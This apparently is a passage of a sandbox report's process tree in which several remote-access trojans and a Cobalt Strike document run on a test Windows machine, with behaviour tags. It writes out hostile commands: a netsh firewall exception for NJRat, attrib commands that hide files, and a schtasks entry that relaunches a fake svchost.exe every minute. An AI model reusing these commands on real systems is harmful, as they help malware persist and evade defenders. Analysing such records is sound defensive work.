C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4236 /prefetch:12⤵PID:4620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7224 /prefetch:82⤵PID:3464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4344
-
-
C:\Users\Admin\Downloads\Blackkomet.exe"C:\Users\Admin\Downloads\Blackkomet.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4100 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\Downloads\Blackkomet.exe" +s +h3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4320
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\Downloads" +s +h3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2484
-
-
C:\Windows\SysWOW64\Windupdt\winupdate.exe"C:\Windows\system32\Windupdt\winupdate.exe"3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1704 -
C:\Windows\SysWOW64\notepad.exenotepad4⤵PID:2116
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h4⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:716
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt" +s +h4⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:1960
-
-
C:\Windows\SysWOW64\Windupdt\winupdate.exe"C:\Windows\system32\Windupdt\winupdate.exe"4⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4588 -
C:\Windows\SysWOW64\notepad.exenotepad5⤵
- Adds Run key to start application
- Drops file in System32 directory
PID:3700
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h5⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:4704
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt" +s +h5⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:2916
-
-
C:\Windows\SysWOW64\notepad.exeC:\Windows\SysWOW64\notepad.exe5⤵PID:5688
-
-
-
C:\Windows\SysWOW64\notepad.exeC:\Windows\SysWOW64\notepad.exe4⤵
- System Location Discovery: System Language Discovery
PID:4688
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7228 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7116 /prefetch:12⤵PID:1512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6040 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3304
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\CobaltStrike.doc" /o ""2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5036 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe3⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2716
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:12⤵PID:1492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5336 /prefetch:82⤵PID:3412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3048 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4612
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Executes dropped EXE
PID:2108 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Executes dropped EXE
PID:3936
-
-
-
C:\Users\Admin\Downloads\CrimsonRAT.exe"C:\Users\Admin\Downloads\CrimsonRAT.exe"2⤵
- Executes dropped EXE
PID:2252 -
C:\ProgramData\Hdlharas\dlrarhsiva.exe"C:\ProgramData\Hdlharas\dlrarhsiva.exe"3⤵
- Executes dropped EXE
PID:2116
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7324 /prefetch:12⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7116 /prefetch:82⤵PID:4812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7256 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:880
-
-
C:\Users\Admin\Downloads\NJRat.exe"C:\Users\Admin\Downloads\NJRat.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:2328 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Downloads\NJRat.exe" "NJRat.exe" ENABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2304
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:12⤵PID:1824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5328 /prefetch:82⤵PID:2292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7360 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:2192
-
-
C:\Users\Admin\Downloads\NetWire.exe"C:\Users\Admin\Downloads\NetWire.exe"2⤵
- Executes dropped EXE
PID:3488 -
C:\Users\Admin\Downloads\NetWire.exe"C:\Users\Admin\Downloads\NetWire.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4812 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:2088
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:12⤵PID:4976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6444 /prefetch:82⤵PID:2456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7408 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:3476
-
-
C:\Users\Admin\Downloads\RevengeRAT.exe"C:\Users\Admin\Downloads\RevengeRAT.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1436 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Drops startup file
- Suspicious use of SetThreadContext
- NTFS ADS
PID:2856 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"4⤵PID:3988
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q6xquj2k.cmdline"4⤵PID:5496
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE47C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE65743EB3704697BC8CC63388A4E57.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:5768
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vo-ewgsx.cmdline"4⤵PID:5948
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE518.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc28074EE8476C48AA8ED6E6DE3D15C17.TMP"5⤵PID:5208
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-pbkpupm.cmdline"4⤵PID:5528
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE585.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc721CE011AD7C4B7481F1EFCB54F02CB5.TMP"5⤵PID:5936
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1y1wdavs.cmdline"4⤵PID:5204
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE612.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc99DEE7DD3E874E1A975B9445DF8126.TMP"5⤵PID:5868
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\oe-umgbz.cmdline"4⤵
- System Location Discovery: System Language Discovery
PID:5376 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE6BE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4F2073E7A0E04299A8497FEBE9502EDA.TMP"5⤵PID:5636
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\eknob0af.cmdline"4⤵PID:1980
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE74A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD781DC1779E14586AE4161FBF7EAC172.TMP"5⤵PID:3876
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\7sjddnqt.cmdline"4⤵PID:1828
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE7C7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC21B72DE1F5F4A46A7A83E844C0A714.TMP"5⤵PID:4728
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vnfcj_y_.cmdline"4⤵
- System Location Discovery: System Language Discovery
PID:4120 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE8E1.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDF132745950C4F26AC60CECABF9DCF81.TMP"5⤵PID:6116
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\d8f_c0zn.cmdline"4⤵PID:2848
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE96D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEEF927DBD830499FBF1702C39CD6C69.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:4100
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jypthmud.cmdline"4⤵PID:1872
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEA29.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc620AC4391C204573B182AD37BA86F6A0.TMP"5⤵PID:1080
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\5hxywqt5.cmdline"4⤵PID:3352
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEB04.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA1C213B17BB0440A853D574783397DEA.TMP"5⤵PID:2244
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cuvjhepc.cmdline"4⤵PID:1924
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEBCF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB16E6E8E3A5D4912934CF68814CAEFE0.TMP"5⤵PID:2252
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\isz2u0gd.cmdline"4⤵PID:3696
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC4C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE7AB75384D11411BA5401E16CA71A93.TMP"5⤵PID:1992
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\uhu-najg.cmdline"4⤵PID:3532
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED46.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc61745F29B4A94F4CA8238C36587CAAA.TMP"5⤵PID:4536
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-4khe5qe.cmdline"4⤵PID:1612
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEE30.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc23530DAEB6B645BEBEEE5FDCCFD7567.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:5320
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ytds4hvg.cmdline"4⤵PID:5416
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEEDC.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc646D2FB94BCC4F3EBF5EB72A4B1E9CA.TMP"5⤵PID:3744
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\d7vp8w5w.cmdline"4⤵
- System Location Discovery: System Language Discovery
PID:5848 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF88.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcDB16597882BF4A2982AECB4030D01FB.TMP"5⤵PID:5172
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6mgdjqtd.cmdline"4⤵PID:1276
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF063.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE8211094F9BD482A971B96671F3D4142.TMP"5⤵PID:2924
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\stuz49pd.cmdline"4⤵PID:5460
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0EF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA74D00FEA3C544D1BED3CC51EC8EE88.TMP"5⤵PID:5516
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\uljbndha.cmdline"4⤵PID:5892
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF16C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2F995A97782C4D5C82576AC1B4689A2.TMP"5⤵PID:6108
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\2d8qudjt.cmdline"4⤵PID:5448
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF208.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF91818E93B504078ACC988941BBE3C94.TMP"5⤵PID:5504
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:548 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"5⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- NTFS ADS
PID:4744 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"6⤵PID:4980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:5360
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ocnzx2mj.cmdline"6⤵PID:5832
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA1D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF6D48A4BA0BC44988656E67E8B64D3E2.TMP"7⤵PID:4368
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qjshrs8e.cmdline"6⤵PID:2908
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAAD9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFB52FD8B6EF14CB599F46E15A29E41E.TMP"7⤵PID:6120
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\z3xrn47o.cmdline"6⤵PID:5744
-
